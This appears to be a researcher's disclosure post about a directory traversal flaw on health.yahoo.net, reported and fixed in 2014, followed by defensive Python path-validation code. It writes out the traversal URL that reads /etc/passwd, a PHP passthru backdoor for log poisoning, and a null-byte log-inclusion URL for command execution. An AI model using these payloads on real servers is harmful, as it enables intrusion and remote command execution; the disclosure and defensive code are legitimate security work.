Health.Yahoo.com Directory Traversal (LFI)

Hello everyone,
I have recently reported a Directory Traversal vulnerability to Yahoo! that I’d like to share with everyone. As I was roaming around the health.yahoo.com website (which redirects to health.yahoo.net), I came across the following link:

http://health.yahoo.net/helpContent.jsp?src=docProfileFaq.html

Of course, the first thing I did was simply remove the HTML file name from the URL and see what I got:

http://health.yahoo.net/helpContent.jsp?src=

and, sure enough, I was able to see the directory listing:

[Screenshot: directory listing returned for an empty src parameter]

I also tried to read the passwd file located in /etc:

http://health.yahoo.net/helpContent.jsp?src=../../../../../../../../../../etc/passwd

and I was successful:

[Screenshot (redacted): contents of /etc/passwd returned by the traversal]

According to a good friend of mine, I could and should have done the following to get a Remote Command Execution:

An attacker may be able to inject the following code by sending a get request such as

<? passthru($_GET[command]) ?>

and inject that into the log file to use as a backdoor

http://health.yahoo.net/helpContent.jsp?title=FAQ&src=../../path/to/logs/logfile%00us&command=ls

But I didn’t think of that at the time, nor did I think to record my PoC, due to all the adrenaline I was feeling when I discovered this vulnerability.
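For the defender's side of this bug, here is an added example (not code from the post or from Yahoo!) showing the checks the helpContent.jsp endpoint was evidently missing: an empty src must not fall back to a directory listing, a NUL byte (the %00 trick above) is refused, and the resolved path must stay inside the help-content directory so a ../ chain cannot reach /etc/passwd or a log file. The help directory path and file names are assumptions for the example.

```python
from pathlib import Path
from typing import Optional

# Assumed location of the help pages; placeholder, not the real server path.
HELP_ROOT = Path("/var/www/help")


class UnsafePathError(ValueError):
    """Raised when the requested src must not be served."""


def resolve_help_file(src: str, root: Path = HELP_ROOT) -> Path:
    """Map the ?src= parameter to a file inside root, or refuse."""
    if not src:
        # The original endpoint answered an empty src with a directory listing.
        raise UnsafePathError("empty src would expose the directory listing")
    if "\x00" in src:
        # A NUL byte can truncate the path in lower layers; never pass it on.
        raise UnsafePathError("NUL byte in path")
    if "/" in src or "\\" in src:
        # Help pages are a flat set of files, so no separators are ever valid.
        raise UnsafePathError("path separators are not allowed")
    if not src.endswith(".html"):
        raise UnsafePathError("only .html help pages are served")
    root_resolved = root.resolve()
    candidate = (root_resolved / src).resolve()
    # Defence in depth: even if the string checks are loosened later,
    # the resolved file must be a direct child of the help directory.
    if candidate.parent != root_resolved:
        raise UnsafePathError("resolved path escapes help root")
    return candidate


def rejection_reason(src: str, root: Path = HELP_ROOT) -> Optional[str]:
    """Return None if src is safe to serve, otherwise the reason it was refused."""
    try:
        resolve_help_file(src, root)
    except UnsafePathError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Constructed inputs mirroring the requests described in the post.
    for src in ("docProfileFaq.html", "",
                "../../../../../../../../../../etc/passwd",
                "../../path/to/logs/logfile\x00us"):
        print(repr(src), "->", rejection_reason(src) or "served")
```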

Thank you for reading!

Timeline:
2014-02-06 Reported
2014-02-10 Status changed to triaged
2014-02-11 Fixed
